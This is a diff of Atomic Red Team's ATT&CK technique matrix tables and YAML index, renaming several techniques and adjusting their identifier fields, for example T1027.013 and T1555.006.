 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Rootkit](../../T1014/T1014.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Local System](../../T1005/T1005.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
@@ -23,7 +23,7 @@
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Exec Into Container](../../T1609/T1609.md) | [Office Application Startup](../../T1137/T1137.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | [Archive Collected Data](../../T1560/T1560.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Wi-Fi Networks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
-|  | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Application Access Token](../../T1550.001/T1550.001.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+|  | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 |  | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Evil Twin [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Software Deployment Tools](../../T1072/T1072.md) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) |  | [Video Capture](../../T1125/T1125.md) |  | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
@@ -54,7 +54,7 @@
 |  |  | IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Process Injection](../../T1055/T1055.md) | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Secrets Management Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Cloud Secrets Management Stores](../../T1555.006/T1555.006.md) |  |  |  |  |  |  |
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  |  |  |
 |  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
@@ -195,7 +195,7 @@
 |  |  |  |  | [XSL Script Processing](../../T1220/T1220.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Modify Cloud Compute Infrastructure: Create Snapshot](../../T1578.001/T1578.001.md) |  |  |  |  |  |  |  |
-|  |  |  |  | [Use Alternate Authentication Material: Application Access Token](../../T1550.001/T1550.001.md) |  |  |  |  |  |  |  |
+|  |  |  |  | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md) |  |  |  |  |  |  |  |
@@ -11,7 +11,7 @@
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | [Service Stop](../../T1489/T1489.md) |
 | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Information Discovery](../../T1082/T1082.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -1046,7 +1046,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:58:05.840Z'
-      name: Encrypted/Encoded File
+      name: 'Obfuscated Files or Information: Encrypted/Encoded File'
      description: "Adversaries may encrypt or encode files to obfuscate strings,
        bytes, and other specific patterns to impede detection. Encrypting and/or
        encoding file content aims to conceal malicious artifacts within a file used
@@ -1095,6 +1095,7 @@ defense-evasion:
      x_mitre_data_sources:
      - 'File: File Creation'
      - 'File: File Metadata'
+      identifier: T1027.013
    atomic_tests: []
  T1014:
    technique:
@@ -14300,7 +14301,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14377,7 +14378,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -45531,7 +45531,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -45608,7 +45608,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -50018,7 +50017,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -50054,6 +50053,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -1046,7 +1046,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:58:05.840Z'
-      name: Encrypted/Encoded File
+      name: 'Obfuscated Files or Information: Encrypted/Encoded File'
      description: "Adversaries may encrypt or encode files to obfuscate strings,
        bytes, and other specific patterns to impede detection. Encrypting and/or
        encoding file content aims to conceal malicious artifacts within a file used
@@ -1095,6 +1095,7 @@ defense-evasion:
      x_mitre_data_sources:
      - 'File: File Creation'
      - 'File: File Metadata'
+      identifier: T1027.013
    atomic_tests: []
  T1014:
